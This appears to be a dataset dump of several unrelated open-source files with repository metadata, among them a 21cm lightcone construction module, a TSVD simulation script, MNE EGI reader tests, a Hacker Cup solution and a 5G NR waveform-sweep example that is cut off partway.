56e6e179440414f3cb564000e6d35fbe167f46cc | 18,177 | py | Python | t2c/lightcone.py | dprelogo/tools21cm | 760ae64dc1aea8b03d270fd473161c577dff874d | ["MIT"] | null | null | null | t2c/lightcone.py | dprelogo/tools21cm | 760ae64dc1aea8b03d270fd473161c577dff874d | ["MIT"] | null | null | null | t2c/lightcone.py | dprelogo/tools21cm | 760ae64dc1aea8b03d270fd473161c577dff874d | ["MIT"] | null | null | null |
'''
Methods to construct lightcones.
'''
from . import const, conv
import numpy as np
import os, glob
from .helper_functions import get_mesh_size, \
determine_redshift_from_filename, get_data_and_type, print_msg, find_idx
from .density_file import DensityFile
from .vel_file import VelocityFile
from . import cosmology as cm
from . import statistics as st
from . import smoothing
import scipy.interpolate
def make_lightcone(filenames, z_low = None, z_high = None, file_redshifts = None, \
cbin_bits = 32, cbin_order = 'c', los_axis = 0, raw_density = False, interpolation='linear'):
'''
Make a lightcone from xfrac, density or dT data. Replaces freq_box.
Parameters:
filenames (string or array): The coeval cubes.
Can be either any of the following:
- An array with the file names
- A text file containing the file names
- The directory containing the files (must only contain one type of files)
z_low (float): the lowest redshift. If not given, the redshift of the
lowest-z coeval cube is used.
z_high (float): the highest redshift. If not given, the redshift of the
highest-z coeval cube is used.
file_redshifts (string or array): The redshifts of the coeval cubes.
Can be any of the following types:
- None: determine the redshifts from file names
- array: array containing the redshift of each coeval cube
- filename: the name of a data file to read the redshifts from
cbin_bits (int): If the data files are in cbin format, you may specify
the number of bits.
cbin_order (char): If the data files are in cbin format, you may specify
the order of the data.
los_axis (int): the axis to use as line-of-sight for the coeval cubes
raw_density (bool): if this is true, and the data is a
density file, the raw (simulation units) density will be returned
instead of the density in cgs units
interpolation (string): can be 'linear', 'step', 'sigmoid' or
'step_cell'.
Determines how slices in between output redshifts are interpolated.
Returns:
(lightcone, z) tuple
- lightcone is the lightcone volume where the first two axes have the same size as the input cubes
- z is an array containing the redshifts along the line-of-sight
.. note::
If z_low is given, that redshift will be the lowest one included,
even if there is no coeval box at exactly that redshift. This can
give results that are subtly different from results calculated with
the old freq_box routine.
'''
if not interpolation in ['linear', 'step', 'sigmoid', 'step_cell']:
raise ValueError('Unknown interpolation type: %s' % interpolation)
#Figure out output redshifts, file names and size of output
filenames = _get_filenames(filenames)
file_redshifts = _get_file_redshifts(file_redshifts, filenames)
assert len(file_redshifts) == len(filenames)
mesh_size = get_mesh_size(filenames[0])
output_z = _get_output_z(file_redshifts, z_low, z_high, mesh_size[0])
#Make the output 32-bit to save memory
lightcone = np.zeros((mesh_size[0], mesh_size[1], len(output_z)), dtype='float32')
comoving_pos_idx = 0
z_bracket_low = None; z_bracket_high = None
data_low = None; data_high = None
#Make the lightcone, one slice at a time
print_msg('Making lightcone between %f < z < %f' % (output_z.min(), output_z.max()))
for z in output_z:
z_bracket_low_new = file_redshifts[file_redshifts <= z].max()
z_bracket_high_new = file_redshifts[file_redshifts > z].min()
#Do we need a new file for the low z?
if z_bracket_low_new != z_bracket_low:
z_bracket_low = z_bracket_low_new
file_idx = np.argmin(np.abs(file_redshifts - z_bracket_low))
if data_high is None:
data_low, datatype = get_data_and_type(filenames[file_idx], cbin_bits, cbin_order, raw_density)
else: #No need to read the file again
data_low = data_high
#Do we need a new file for the high z?
if z_bracket_high_new != z_bracket_high:
z_bracket_high = z_bracket_high_new
file_idx = np.argmin(np.abs(file_redshifts - z_bracket_high))
data_high, datatype = get_data_and_type(filenames[file_idx], cbin_bits, cbin_order, raw_density)
#Make the slice by interpolating, then move to next index
data_interp = _get_interp_slice(data_high, data_low, z_bracket_high, \
z_bracket_low, z, comoving_pos_idx, los_axis, interpolation)
lightcone[:,:,comoving_pos_idx] = data_interp
comoving_pos_idx += 1
return lightcone, output_z
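# Illustrative call (hypothetical path; not part of the original module):
#   lightcone, z = make_lightcone('/path/to/xfrac_files/', z_low=7.0,
#                                 z_high=9.0, interpolation='sigmoid')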
def make_velocity_lightcone(vel_filenames, dens_filenames, z_low = None, \
z_high = None, file_redshifts = None, los_axis = 0):
'''
Make a lightcone from velocity data. Since velocity files contain momentum
rather than actual velocity, you must specify filenames for both velocity
and density.
Parameters:
vel_filenames (string or array): The coeval velocity cubes.
Can be any of the following:
- An array with the file names
- A text file containing the file names
- The directory containing the files (must only contain one type of files)
dens_filenames (string or array): The coeval density cubes.
Same format as vel_filenames.
z_low (float): the lowest redshift. If not given, the redshift of the
lowest-z coeval cube is used.
z_high (float): the highest redshift. If not given, the redshift of the
highest-z coeval cube is used.
file_redshifts (string or array): The redshifts of the coeval cubes.
Can be any of the following types:
- None: determine the redshifts from file names
- array: array containing the redshift of each coeval cube
- filename: the name of a data file to read the redshifts from
los_axis (int): the axis to use as line-of-sight for the coeval cubes
Returns:
(lightcone, z) tuple
- lightcone is the lightcone volume where the first two axes have the same size as the input cubes
- z is an array containing the redshifts along the line-of-sight
'''
dens_filenames = _get_filenames(dens_filenames)
file_redshifts = _get_file_redshifts(file_redshifts, dens_filenames)
vel_filenames = _get_filenames(vel_filenames)
assert(len(file_redshifts) == len(vel_filenames))
assert(len(vel_filenames) == len(dens_filenames))
mesh_size = get_mesh_size(dens_filenames[0])
output_z = _get_output_z(file_redshifts, z_low, z_high, mesh_size[0])
lightcone = np.zeros((3, mesh_size[0], mesh_size[1], len(output_z)), dtype='float32')
comoving_pos_idx = 0
z_bracket_low = None; z_bracket_high = None
for z in output_z:
z_bracket_low_new = file_redshifts[file_redshifts <= z].max()
z_bracket_high_new = file_redshifts[file_redshifts > z].min()
if z_bracket_low_new != z_bracket_low:
z_bracket_low = z_bracket_low_new
file_idx = np.argmin(np.abs(file_redshifts - z_bracket_low))
dfile = DensityFile(dens_filenames[file_idx])
vel_file = VelocityFile(vel_filenames[file_idx])
data_low = vel_file.get_kms_from_density(dfile)
del dfile
del vel_file
if z_bracket_high_new != z_bracket_high:
z_bracket_high = z_bracket_high_new
file_idx = np.argmin(np.abs(file_redshifts - z_bracket_high))
dfile = DensityFile(dens_filenames[file_idx])
vel_file = VelocityFile(vel_filenames[file_idx])
data_high = vel_file.get_kms_from_density(dfile)
del dfile
del vel_file
data_interp = _get_interp_slice(data_high, data_low, z_bracket_high, \
z_bracket_low, z, comoving_pos_idx, los_axis)
lightcone[:,:,:,comoving_pos_idx] = data_interp
comoving_pos_idx += 1
return lightcone, output_z
def _get_output_z(file_redshifts, z_low, z_high, box_grid_n):
'''
Determine the output redshifts. For internal use.
'''
if z_low is None:
z_low = file_redshifts.min()
if z_high is None:
z_high = file_redshifts.max()
output_z = redshifts_at_equal_comoving_distance(z_low, z_high, box_grid_n)
if min(output_z) < min(file_redshifts) or max(output_z) > max(file_redshifts):
print('Warning! You have specified a redshift range of %.3f < z < %.3f' % (min(output_z), max(output_z)))
print('but you only have files for the range %.3f < z < %.3f.' % (min(file_redshifts), max(file_redshifts)))
print('The redshift range will be truncated.')
output_z = output_z[output_z >= min(file_redshifts)]
output_z = output_z[output_z <= max(file_redshifts)]
if len(output_z) < 1:
raise Exception('No valid redshifts in range!')
return output_z
def redshifts_at_equal_comoving_distance(z_low, z_high, box_grid_n=256, \
box_length_mpc=None):
'''
Make a frequency axis vector with equal spacing in co-moving LOS coordinates.
The comoving distance between each frequency will be the same as the cell
size of the box.
Parameters:
z_low (float): The lower redshift
z_high (float): The upper redhisft
box_grid_n = 256 (int): the number of slices in an input box
box_length_mpc (float): the size of the box in cMpc. If None,
set to conv.LB
Returns:
numpy array containing the redshifts
'''
if box_length_mpc is None:
box_length_mpc = conv.LB
assert(z_high > z_low)
z = z_low
z_array = []
while z < z_high:
z_array.append(z)
nu = const.nu0/(1.0+z)
dnu = const.nu0*const.Hz(z)*box_length_mpc/(1.0 + z)**2/const.c/float(box_grid_n)
z = const.nu0/(nu - dnu) - 1.0
return np.array(z_array)
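# Derivation sketch for the step above: a comoving step dD = LB/N corresponds
# to dz = H(z)*LB/(c*N), and with nu = nu0/(1+z) this gives
# dnu = nu0*H(z)*LB/((1+z)**2*c*N), which is the expression used in the loop.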
def get_lightcone_subvolume(lightcone, redshifts, central_z, \
depth_mhz=None, depth_mpc=None, odd_num_cells=True, \
subtract_mean=True, fov_Mpc=None):
'''
Extract a subvolume from a lightcone, at a given central redshift,
and with a given depth. The depth can be specified in Mpc or MHz.
You must give exactly one of these parameters.
Parameters:
ligthcone (numpy array): the lightcone
redshifts (numpy array): the redshifts along the LOS
central_z (float): the central redshift of the subvolume
depth_mhz (float): the depth of the subvolume in MHz
depth_mpc (float): the depth of the subvolume in Mpc
odd_num_cells (bool): if true, the depth of the box will always
be an odd number of cells. This avoids problems with
power spectrum calculations.
subtract_mean (bool): if true, subtract the mean of the signal (Default: True)
fov_Mpc (float): the FoV size in Mpc
Returns:
Tuple with (subvolume, dims) where dims is a tuple
with the dimensions of the subvolume in Mpc
'''
    # np.nonzero returns a tuple of arrays, so the old check
    # `len(np.nonzero([depth_mhz, depth_mpc])) == 1` was always true.
    assert (depth_mhz is None) != (depth_mpc is None), \
        'Give exactly one of depth_mhz or depth_mpc'
if fov_Mpc is None:
fov_Mpc = conv.LB
central_nu = cm.z_to_nu(central_z)
    if depth_mpc is not None:  # Depth is given in Mpc
central_dist = cm.nu_to_cdist(central_nu)
low_z = cm.cdist_to_z(central_dist-depth_mpc/2.)
high_z = cm.cdist_to_z(central_dist+depth_mpc/2.)
else: #Depth is given in MHz
low_z = cm.nu_to_z(central_nu+depth_mhz/2.)
high_z = cm.nu_to_z(central_nu-depth_mhz/2.)
if low_z < redshifts.min():
raise Exception('Lowest z is outside range')
if high_z > redshifts.max():
raise Exception('Highest z is outside range')
low_n = int(find_idx(redshifts, low_z))
high_n = int(find_idx(redshifts, high_z))
if (high_n-low_n) % 2 == 0 and odd_num_cells:
high_n += 1
subbox = lightcone[:,:,low_n:high_n]
if subtract_mean:
subbox = st.subtract_mean_signal(subbox, los_axis=2)
box_depth = float(subbox.shape[2])/lightcone.shape[1]*fov_Mpc
box_dims = (fov_Mpc, fov_Mpc, box_depth)
return subbox, box_dims
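# Illustrative call (assumes `lightcone` and `z` from make_lightcone above):
#   subvol, dims = get_lightcone_subvolume(lightcone, z, central_z=8.0,
#                                          depth_mhz=8.0)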
def _get_interp_slice(data_high, data_low, z_bracket_high, z_bracket_low, z, \
comoving_pos_idx, los_axis, interpolation='linear'):
'''
Interpolate between two data slices. For internal use.
'''
slice_ind = comoving_pos_idx % data_low.shape[1]
slice_low = _get_slice(data_low, slice_ind, los_axis)
slice_high = _get_slice(data_high, slice_ind, los_axis)
if interpolation == 'linear':
slice_interp = ((z-z_bracket_low)*slice_high + \
(z_bracket_high - z)*slice_low)/(z_bracket_high-z_bracket_low)
elif interpolation == 'step':
transition_z = (z_bracket_high-z_bracket_low)/2.
if z < transition_z:
slice_interp = slice_low.copy()
else:
slice_interp = slice_high.copy()
elif interpolation == 'sigmoid':
zp = -10. + 20.*(z-z_bracket_low)/(z_bracket_high-z_bracket_low)
beta = 2.
g = 1./(1.+np.exp(-beta*zp))
slice_interp = slice_low*(1.-g) + slice_high*g
elif interpolation == 'step_cell':
slice_interp = _get_step_weighted_slice(slice_low, slice_high, z_bracket_high, z_bracket_low, z)
else:
raise Exception('Unknown interpolation method: %s' % interpolation)
return slice_interp
def _get_step_weighted_slice(slice_low, slice_high, z_bracket_high, z_bracket_low, z):
'''
Interpolate using a step function where the step position is based
on the proximity to an ionized region
'''
smoothed = smoothing.smooth_gauss(slice_high, sigma=4.)
diff = np.abs(slice_high-slice_low)
#smoothed=1 means early transition. smoothed=0 means late
#smoothed -= changed_cells.min()
#smoothed /= (changed_cells.max()-changed_cells.min())
step_transitions = _get_step_transitions(smoothed, diff>1.e-3)
step_transitions = z_bracket_low + step_transitions*(z_bracket_high-z_bracket_low)
interp_slice = slice_high.copy()
interp_slice[z < step_transitions] = slice_low[z < step_transitions]
return interp_slice
def _get_step_transitions(cell_dist, diff_idx):
#Replace each value in cell_dist with the number of cells
#with a lower value. Then normalize to be between 0 and 1
values_flat = cell_dist[diff_idx].flatten()
values_sorted = sorted(values_flat+np.random.random(len(values_flat))*1.e-9)
values_uniform = np.linspace(values_sorted[0], values_sorted[-1], len(values_sorted))
f = scipy.interpolate.interp1d(values_sorted, values_uniform, bounds_error=False, fill_value=0.)
output_values = f(cell_dist)
output_values -= output_values.min()
output_values /= output_values.max()
return output_values
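# In effect this is a rank transform (histogram equalization): each changed
# cell's value is replaced by its normalized rank, spreading the transition
# times roughly uniformly over [0, 1].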
def _get_slice(data, idx, los_axis, slice_depth=1):
'''
Slice a data cube along a given axis. For internal use.
'''
assert len(data.shape) == 3 or len(data.shape) == 4
assert los_axis >= 0 and los_axis < 3
idx1 = idx
idx2 = idx1+slice_depth
if len(data.shape) == 3: #scalar field
if los_axis == 0:
return np.squeeze(data[idx1:idx2,:,:])
elif los_axis == 1:
return np.squeeze(data[:,idx1:idx2,:])
return np.squeeze(data[:,:,idx1:idx2])
else: #Vector field
if los_axis == 0:
return np.squeeze(data[:,idx1:idx2,:,:])
elif los_axis == 1:
return np.squeeze(data[:,:,idx1:idx2,:])
return np.squeeze(data[:,:,:,idx1:idx2])
def _get_filenames(filenames_in):
'''
If filenames_in is a list of files, return as it is
If it is a directory, make sure it only contains data files,
then return the list of files in the directory
If it is a text file, read the list of files from the file
'''
if hasattr(filenames_in, '__iter__'):
filenames_out = filenames_in
elif os.path.isdir(filenames_in):
files_in_dir = glob.glob(filenames_in + '/*')
extensions = [os.path.splitext(f)[-1] for f in files_in_dir]
if not _all_same(extensions):
raise Exception('The directory may only contain one file type.')
filenames_out = files_in_dir
elif os.path.isfile(filenames_in):
f = open(filenames_in)
names = [l.strip() for l in f.readlines()]
f.close()
filenames_out = names
else:
raise Exception('Invalid filenames input')
return np.array(filenames_out)
def _get_file_redshifts(redshifts_in, filenames):
'''
If redshifts_in is None, try to determine from file names
If it's a directory, read the redshifts
Else, return as is
'''
if hasattr(redshifts_in, '__iter__'):
redshifts_out = redshifts_in
elif redshifts_in is None:
redshifts_out = [determine_redshift_from_filename(f) for f in filenames]
redshifts_out = np.array(redshifts_out)
elif os.path.exists(redshifts_in):
redshifts_out = np.loadtxt(redshifts_in)
else:
raise Exception('Invalid data for file redshifts.')
return redshifts_out
def _all_same(items):
return all(x == items[0] for x in items)
| 39.601307 | 116 | 0.643561 |
2d8a82911a67282c126d2c5f110f339b65bec27f | 2,462 | py | Python | s_tsvd_smlb.py | GrzegorzMika/Morozov-in-Poisson-Processes | cd1ea799fbc49a74c442df5af1bb2390539390a5 | ["MIT"] | null | null | null | s_tsvd_smlb.py | GrzegorzMika/Morozov-in-Poisson-Processes | cd1ea799fbc49a74c442df5af1bb2390539390a5 | ["MIT"] | null | null | null | s_tsvd_smlb.py | GrzegorzMika/Morozov-in-Poisson-Processes | cd1ea799fbc49a74c442df5af1bb2390539390a5 | ["MIT"] | null | null | null |
import numpy as np
import pandas as pd
from EstimatorSpectrum import TSVD
from Generator import LSW
from SVD import LordWillisSpektor
from test_functions import kernel_transformed, BIMODAL, BETA, SMLA, SMLB
replications = 10
size = [2000, 10000, 1000000]
max_size = 100
functions = [SMLB]
functions_name = ['SMLB']
taus = [1]
taus_name = ['10']
rhos = [750, 1000, 2000, 3000, 5000, 6000, 7000, 8000, 9000, 10000, 50000, 100000]
rhos_name = ['750', '1000', '2000', '3000', '5000', '6000', '7000', '8000', '9000', '10000', '50000', '100000']
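# The loops below sweep every (sample size, test function, tau, rho)
# combination and write one CSV of estimates per combination.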
if __name__ == '__main__':
for s in size:
for i, fun in enumerate(functions):
for j, tau in enumerate(taus):
for k, rho in enumerate(rhos):
generator = LSW(pdf=fun, sample_size=s, seed=914)
results = {'selected_param': [], 'oracle_param': [], 'oracle_loss': [], 'loss': [], 'solution': [],
'oracle_solution': []}
for _ in range(replications):
spectrum = LordWillisSpektor(transformed_measure=True)
obs = generator.generate()
tsvd = TSVD(kernel=kernel_transformed, singular_values=spectrum.singular_values,
left_singular_functions=spectrum.left_functions,
right_singular_functions=spectrum.right_functions,
observations=obs, sample_size=s, max_size=max_size, tau=tau,
transformed_measure=True, rho=rho)
tsvd.estimate()
tsvd.oracle(fun, patience=10)
solution = list(tsvd.solution(np.linspace(0, 1, 10000)))
results['selected_param'].append(tsvd.regularization_param)
results['oracle_param'].append(tsvd.oracle_param)
results['oracle_loss'].append(tsvd.oracle_loss)
results['loss'].append(tsvd.residual)
results['solution'].append(solution)
results['oracle_solution'].append(list(tsvd.oracle_solution))
pd.DataFrame(results).to_csv(
'TSVD_rho_{}_tau_{}_size_{}_fun_{}.csv'.format(rhos_name[k], taus_name[j], s,
functions_name[i]))
| 52.382979 | 119 | 0.540211 |
50295356585b3bfaabe24fca61c7d7fc8b621886 | 814 | py | Python | jetset/utils.py | AAGunya/jetset | 53cb0e3e1f308273f19fd4c9b288be12447fd43d | ["BSD-3-Clause"] | null | null | null | jetset/utils.py | AAGunya/jetset | 53cb0e3e1f308273f19fd4c9b288be12447fd43d | ["BSD-3-Clause"] | null | null | null | jetset/utils.py | AAGunya/jetset | 53cb0e3e1f308273f19fd4c9b288be12447fd43d | ["BSD-3-Clause"] | null | null | null |
from __future__ import absolute_import, division, print_function
from builtins import (bytes, str, open, super, range,
zip, round, input, int, pow, object, map, zip)
__author__ = "Andrea Tramacere"
__all__=['check_frame','unexpetced_behaviour']
import re
def check_frame(frame):
allowed=['obs','src','blob']
if frame not in allowed:
raise RuntimeError('rest frame', frame, 'not allowed',allowed)
def unexpetced_behaviour():
raise RuntimeError('the code reached a condition that should never happen!')
def clean_var_name(s):
    # str.replace returns a new string; the original code discarded the result,
    # so '-' and ' ' were never actually replaced.
    s = s.replace('-', '_')
    s = s.replace(' ', '_')
# Remove invalid characters
s = re.sub('[^0-9a-zA-Z_]', '', s)
# Remove leading characters until we find a letter or underscore
s = re.sub('^[^a-zA-Z_]+', '', s)
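    # Example (illustrative): clean_var_name('2-flux density') -> '_flux_density'
    # ('-' and ' ' become '_', then the leading digit is stripped above)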
    return s
| 21.421053 | 80 | 0.653563 |
98702bda979c837225815ddaf23193db02a42c0d | 377 | py | Python | facebook-hacker-cup-2013/beautiful-strings/beautiful-strings.py | robertdimarco/puzzles | 61e1b62700503fdb8794fba7fa5d3156e7adf72b | ["MIT"] | 36 | 2015-05-11T20:22:55.000Z | 2021-09-26T07:36:49.000Z | facebook-hacker-cup-2013/beautiful-strings/beautiful-strings.py | robertdimarco/puzzles | 61e1b62700503fdb8794fba7fa5d3156e7adf72b | ["MIT"] | null | null | null | facebook-hacker-cup-2013/beautiful-strings/beautiful-strings.py | robertdimarco/puzzles | 61e1b62700503fdb8794fba7fa5d3156e7adf72b | ["MIT"] | 16 | 2016-03-08T16:25:46.000Z | 2022-03-16T06:28:51.000Z |
#!/usr/bin/env python
import string, sys
m = int(sys.stdin.readline())
for i in range(1, m+1):
score, line = 0, sys.stdin.readline()
line = ''.join(char for char in line.lower() if 'a' <= char <= 'z')
freq = sorted([line.count(char) for char in set(line)])
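    # Greedy: ascending frequencies are paired with ascending beauty values,
    # so the most frequent letter gets 26, the next 25, and so on.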
for j, num in enumerate(freq):
score += num * (26 - len(freq) + j + 1)
    print 'Case #%d: %d' % (i, score)
| 31.416667 | 69 | 0.596817 |
89f601a4c321a332c6ac92deb2a76e02ea40d16e | 7,218 | py | Python | mne/io/egi/tests/test_egi.py | fmamashli/mne-python | 52f064415e7c9fa8fe243d22108dcdf3d86505b9 | ["BSD-3-Clause"] | 1 | 2020-04-25T05:01:54.000Z | 2020-04-25T05:01:54.000Z | mne/io/egi/tests/test_egi.py | fmamashli/mne-python | 52f064415e7c9fa8fe243d22108dcdf3d86505b9 | ["BSD-3-Clause"] | 23 | 2017-09-12T11:08:26.000Z | 2019-10-04T11:11:29.000Z | mne/io/egi/tests/test_egi.py | fmamashli/mne-python | 52f064415e7c9fa8fe243d22108dcdf3d86505b9 | ["BSD-3-Clause"] | 3 | 2019-01-28T13:48:00.000Z | 2019-07-10T16:02:11.000Z |
# -*- coding: utf-8 -*-
# Authors: Denis A. Engemann <denis.engemann@gmail.com>
# simplified BSD-3 license
import os.path as op
import inspect
import numpy as np
from numpy.testing import assert_array_equal, assert_allclose, assert_equal
import pytest
from scipy import io as sio
from mne import find_events, pick_types
from mne.io import read_raw_egi
from mne.io.tests.test_raw import _test_raw_reader
from mne.io.egi.egi import _combine_triggers
from mne.utils import run_tests_if_main
from mne.datasets.testing import data_path, requires_testing_data
FILE = inspect.getfile(inspect.currentframe())
base_dir = op.join(op.dirname(op.abspath(FILE)), 'data')
egi_fname = op.join(base_dir, 'test_egi.raw')
egi_txt_fname = op.join(base_dir, 'test_egi.txt')
@requires_testing_data
def test_io_egi_mff():
"""Test importing EGI MFF simple binary files."""
egi_fname_mff = op.join(data_path(), 'EGI', 'test_egi.mff')
raw = read_raw_egi(egi_fname_mff, include=None)
assert ('RawMff' in repr(raw))
include = ['DIN1', 'DIN2', 'DIN3', 'DIN4', 'DIN5', 'DIN7']
raw = _test_raw_reader(read_raw_egi, input_fname=egi_fname_mff,
include=include, channel_naming='EEG %03d')
assert_equal('eeg' in raw, True)
eeg_chan = [c for c in raw.ch_names if 'EEG' in c]
assert_equal(len(eeg_chan), 129)
picks = pick_types(raw.info, eeg=True)
assert_equal(len(picks), 129)
assert_equal('STI 014' in raw.ch_names, True)
events = find_events(raw, stim_channel='STI 014')
assert_equal(len(events), 8)
assert_equal(np.unique(events[:, 1])[0], 0)
assert (np.unique(events[:, 0])[0] != 0)
assert (np.unique(events[:, 2])[0] != 0)
pytest.raises(ValueError, read_raw_egi, egi_fname_mff, include=['Foo'],
preload=False)
pytest.raises(ValueError, read_raw_egi, egi_fname_mff, exclude=['Bar'],
preload=False)
for ii, k in enumerate(include, 1):
assert (k in raw.event_id)
assert (raw.event_id[k] == ii)
def test_io_egi():
"""Test importing EGI simple binary files."""
# test default
with open(egi_txt_fname) as fid:
data = np.loadtxt(fid)
t = data[0]
data = data[1:]
data *= 1e-6 # μV
with pytest.warns(RuntimeWarning, match='Did not find any event code'):
raw = read_raw_egi(egi_fname, include=None)
assert 'RawEGI' in repr(raw)
data_read, t_read = raw[:256]
assert_allclose(t_read, t)
assert_allclose(data_read, data, atol=1e-10)
include = ['TRSP', 'XXX1']
raw = _test_raw_reader(read_raw_egi, input_fname=egi_fname,
include=include)
assert_equal('eeg' in raw, True)
eeg_chan = [c for c in raw.ch_names if c.startswith('E')]
assert_equal(len(eeg_chan), 256)
picks = pick_types(raw.info, eeg=True)
assert_equal(len(picks), 256)
assert_equal('STI 014' in raw.ch_names, True)
events = find_events(raw, stim_channel='STI 014')
assert_equal(len(events), 2) # ground truth
assert_equal(np.unique(events[:, 1])[0], 0)
assert (np.unique(events[:, 0])[0] != 0)
assert (np.unique(events[:, 2])[0] != 0)
triggers = np.array([[0, 1, 1, 0], [0, 0, 1, 0]])
# test trigger functionality
triggers = np.array([[0, 1, 0, 0], [0, 0, 1, 0]])
events_ids = [12, 24]
new_trigger = _combine_triggers(triggers, events_ids)
assert_array_equal(np.unique(new_trigger), np.unique([0, 12, 24]))
pytest.raises(ValueError, read_raw_egi, egi_fname, include=['Foo'],
preload=False)
pytest.raises(ValueError, read_raw_egi, egi_fname, exclude=['Bar'],
preload=False)
for ii, k in enumerate(include, 1):
assert (k in raw.event_id)
assert (raw.event_id[k] == ii)
@requires_testing_data
def test_io_egi_pns_mff():
"""Test importing EGI MFF with PNS data."""
egi_fname_mff = op.join(data_path(), 'EGI', 'test_egi_pns.mff')
raw = read_raw_egi(egi_fname_mff, include=None, preload=True,
verbose='error')
assert ('RawMff' in repr(raw))
pns_chans = pick_types(raw.info, ecg=True, bio=True, emg=True)
assert_equal(len(pns_chans), 7)
names = [raw.ch_names[x] for x in pns_chans]
pns_names = ['Resp. Temperature'[:15],
'Resp. Pressure',
'ECG',
'Body Position',
'Resp. Effort Chest'[:15],
'Resp. Effort Abdomen'[:15],
'EMG-Leg']
_test_raw_reader(read_raw_egi, input_fname=egi_fname_mff,
channel_naming='EEG %03d', verbose='error')
assert_equal(names, pns_names)
mat_names = [
'Resp_Temperature'[:15],
'Resp_Pressure',
'ECG',
'Body_Position',
'Resp_Effort_Chest'[:15],
'Resp_Effort_Abdomen'[:15],
'EMGLeg'
]
egi_fname_mat = op.join(data_path(), 'EGI', 'test_egi_pns.mat')
mc = sio.loadmat(egi_fname_mat)
for ch_name, ch_idx, mat_name in zip(pns_names, pns_chans, mat_names):
print('Testing {}'.format(ch_name))
mc_key = [x for x in mc.keys() if mat_name in x][0]
cal = raw.info['chs'][ch_idx]['cal']
mat_data = mc[mc_key] * cal
raw_data = raw[ch_idx][0]
assert_array_equal(mat_data, raw_data)
@requires_testing_data
def test_io_egi_pns_mff_bug():
"""Test importing EGI MFF with PNS data (BUG)."""
egi_fname_mff = op.join(data_path(), 'EGI', 'test_egi_pns_bug.mff')
with pytest.warns(RuntimeWarning, match='EGI PSG sample bug'):
raw = read_raw_egi(egi_fname_mff, include=None, preload=True,
verbose='warning')
egi_fname_mat = op.join(data_path(), 'EGI', 'test_egi_pns.mat')
mc = sio.loadmat(egi_fname_mat)
pns_chans = pick_types(raw.info, ecg=True, bio=True, emg=True)
pns_names = ['Resp. Temperature'[:15],
'Resp. Pressure',
'ECG',
'Body Position',
'Resp. Effort Chest'[:15],
'Resp. Effort Abdomen'[:15],
'EMG-Leg']
mat_names = [
'Resp_Temperature'[:15],
'Resp_Pressure',
'ECG',
'Body_Position',
'Resp_Effort_Chest'[:15],
'Resp_Effort_Abdomen'[:15],
'EMGLeg'
]
for ch_name, ch_idx, mat_name in zip(pns_names, pns_chans, mat_names):
print('Testing {}'.format(ch_name))
mc_key = [x for x in mc.keys() if mat_name in x][0]
cal = raw.info['chs'][ch_idx]['cal']
mat_data = mc[mc_key] * cal
mat_data[:, -1] = 0 # The MFF has one less sample, the last one
raw_data = raw[ch_idx][0]
assert_array_equal(mat_data, raw_data)
@requires_testing_data
def test_io_egi_crop_no_preload():
"""Test crop non-preloaded EGI MFF data (BUG)."""
egi_fname_mff = op.join(data_path(), 'EGI', 'test_egi.mff')
raw = read_raw_egi(egi_fname_mff, preload=False)
raw.crop(17.5, 20.5)
raw.load_data()
raw_preload = read_raw_egi(egi_fname_mff, preload=True)
raw_preload.crop(17.5, 20.5)
raw_preload.load_data()
assert_allclose(raw._data, raw_preload._data)
run_tests_if_main()
| 35.732673 | 75 | 0.62829 |
c55ffc99d2d71cb5d3cdd8f7df79bafb297c6b98 | 3,510 | py | Python | examples/nr_create_waveform_batch.py | smooresni/batchwave | d2fb66942aadee142ed5da6ee74f9fc00a6c8720 | [
"MIT"
] | 2 | 2020-08-24T11:23:26.000Z | 2021-07-21T13:22:24.000Z | examples/nr_create_waveform_batch.py | smooresni/batchwave | d2fb66942aadee142ed5da6ee74f9fc00a6c8720 | [
"MIT"
] | null | null | null | examples/nr_create_waveform_batch.py | smooresni/batchwave | d2fb66942aadee142ed5da6ee74f9fc00a6c8720 | [
"MIT"
] | 1 | 2021-07-21T13:22:27.000Z | 2021-07-21T13:22:27.000Z | """
This example shows how to create multiple waveforms by sweeping various parameters.
"""
import wfmcreator
from wfmcreator import nr
carrier_counts = [1, 2, 4, 8]
channel_bandwidths = [20e6, 50e6, 100e6]
subcarrier_spacings = [30e3]
modulation_schemes = [nr.PuschModulationType.QPSK, nr.PuschModulationType.QAM16,
nr.PuschModulationType.QAM64, nr.PuschModulationType.QAM256]
# waveform
nrw = nr.Waveform()
nrw.auto_increment_cell_id_enabled = True
# waveform creator
wc = wfmcreator.WaveformCreator()
# subblock
subblock = nrw.subblocks[0]
subblock.offset = 0.0
subblock.spacing_type = nr.SubblockSpacingType.NOMINAL
subblock.reference_cc_index = -1
# carrier
for num_carriers in carrier_counts:
del subblock.carriers
subblock.num_carriers = num_carriers
for bandwidth in channel_bandwidths:
for scs in subcarrier_spacings:
for modulation in modulation_schemes:
for carrier in subblock.carriers:
carrier.cell_id = 0
carrier.frequency_range = nr.FrequencyRange.RANGE_1
carrier.link_direction = nr.LinkDirection.UPLINK
carrier.downlink_channel_configuration_mode = nr.DownlinkChannelConfigurationMode.USER_DEFINED
carrier.downlink_test_model = nr.DownlinkTestModel.TM1_1
carrier.downlink_test_model_duplex_scheme = nr.DownlinkTestModelDuplexScheme.FDD
carrier.channel_bandwidth = bandwidth
carrier.bandwidth_part_subcarrier_spacing = scs
# pusch
pusch = carrier.pusch[0]
pusch.rb_allocation = '0:last'
pusch.slot_allocation = '0:last'
pusch.symbol_allocation = '0:last'
pusch.modulation_type = modulation
pusch.mapping_type = nr.PuschMappingType.TYPE_A
pusch.dmrs_duration = nr.PuschDmrsDuration.SINGLE_SYMBOL
pusch.dmrs_configuration = nr.PuschDmrsConfiguration.TYPE_1
pusch.dmrs_additional_positions = 0
pusch.dmrs_type_a_position = 2
pusch.transform_precoding_enabled = False
pusch.dmrs_release_version = nr.PuschDmrsReleaseVersion.RELEASE_15
pusch.number_of_cdm_groups = 1
# pdsch
pdsch = carrier.pdsch[0]
pdsch.rb_allocation = '0:last'
pdsch.slot_allocation = '0:last'
pdsch.symbol_allocation = '0:last'
pdsch.modulation_type = nr.PdschModulationType.QAM256
pdsch.mapping_type = nr.PdschMappingType.TYPE_A
pdsch.dmrs_duration = nr.PdschDmrsDuration.SINGLE_SYMBOL
pdsch.dmrs_configuration = nr.PdschDmrsConfiguration.TYPE_1
pdsch.dmrs_additional_positions = 0
pdsch.dmrs_type_a_position = 2
pdsch.transform_precoding_enabled = False
pdsch.dmrs_release_version = nr.PdschDmrsReleaseVersion.RELEASE_15
pdsch.number_of_cdm_groups = 1
# invoke waveform creator
